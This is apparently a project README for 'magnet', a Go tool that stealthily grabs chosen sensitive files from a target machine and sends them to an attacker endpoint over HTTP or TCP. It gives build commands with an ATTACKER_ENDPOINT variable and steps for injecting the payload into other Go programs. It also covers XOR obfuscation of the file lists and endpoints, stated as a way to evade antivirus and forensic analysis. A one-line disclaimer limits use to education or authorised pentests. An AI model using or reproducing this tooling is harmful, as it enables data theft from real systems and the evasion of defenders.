magnet
🧲⚡
Grab interesting files from target
Cross-platform
Stealth
Portable
The library is built to fetch predefined files of interest from a remote device. It assumes that an HTTP endpoint is listening when the program is launched.
Program execution on target will stealthy provide you the files you ask for.
You have 2 possibilities:
For educational purpose only or during pentest assessment with prior permission
Usage
All the work is made At compilation time, you need to specify:
- The remote endpoint, where juicy files are uploaded
- The Juicy files, list of files you want to grab
- The target os, to fit the target (between:
windows
, darwin
, linux
)
- The method uses for exfiltration (
http
, tcp
)
export KEY=[YOUR_KEY]
export FILES=[FILENAME]
export ENDPOINT=[ATTACKER_ENDPOINT]
export TARGET_OS=[TARGET_OS]
export METHOD=[EXFILTRATION_METHOD]
🥷 Inject magnet
in your Go program
- Add
magnet
import and declare variables outside your main()
function:
import "github.com/ariary/magnet/pkg/magnet"
var FileList,Key,Endpoint,Method string
- Add magnet payload in the
main()
:
sender := magnet.InitMagnetSender(Method)
magnet.Magnet(sender, FileList, Endpoint, Key, debug)
- Finally, modify the build command by adding
-ldflags "-X 'main.FileList=$FILES' -X 'main.Key=$KEY' -X 'main.Endpoint=$ENDPOINT' -X 'main.Method=$METHOD'"
and CGO_ENABLED=0
see declare magnet
environment variables
âš¡ Standalone
To build magnet
binary in one step:
# ensure lobfuscator is in your PATH
./build.sh $TARGET_OS $FILES $ENDPOINT $KEY $METHOD
See lobfuscator
and full example
Obfuscation/Encryption
To avoid detection systems, as we are seeking for sensitive files, the different files we want to grab must not be in clear text within the binary . Hence it used basic encryption with the key to decrypt embedded in binary. (The aim is only to avoid AV and Detection system not to have strong encryption scheme)
The same thing is made for the remote endpoints, to make the forensic analysis harder.
lobfuscator
is the simple tool to perform the XOR encryption/decryption.
An exemple to build the obfuscated list:
cat [FILE] | lobfuscator $KEY > obfuscated.txt
# decrypt: cat obfuscated.txt | lobfuscator -d $KEY
Build lobfuscator
make build.lobfuscator
Declare magnet
envar
Define FILES
and ENDPOINT
envar:
export FILES=$(cat [FILE] | lobfuscator $KEY)
export ENDPOINT=$(echo "[ENDPOINT]" | lobfuscator $KEY)
Go further
You can also use lobfuscator
without providing a key to encrypt (will generate a random key of the size of the input):
# Encrypt with random key
cat samples/linux_juicy_files.txt | ./lobfuscator > encrypted.txt 2>tmp.txt && cat tmp.txt | cut -d ":" -f 2- > keys.txt && rm tmp.txt
# Decrypt using file containing keys
cat encrypted.txt| ./lobfuscator -d -kf keys.txt
Notes
- For the remote endpoint , I suggest you to use the
/push
endpoint of a gitar
listener
- The software is built to be stealthy hence:
- error handling is not verbose (hidden flag to get more verbosity
-thisisdebug
)
- I suggest to overwrite usage string in
magnet.go
to fit your attack scenario (for standalone use)
- To enhance the binary obfuscation use
garble
to compile magnet
instead of go
(adapt build.sh
consequently)
To do
- Handle directories
- Use other protocols to send files (ICMP, DNS, SMTP, etc...)
magnetgentool
is on the making, it will be used with //go:generate
comment to stealthy inject magnet code.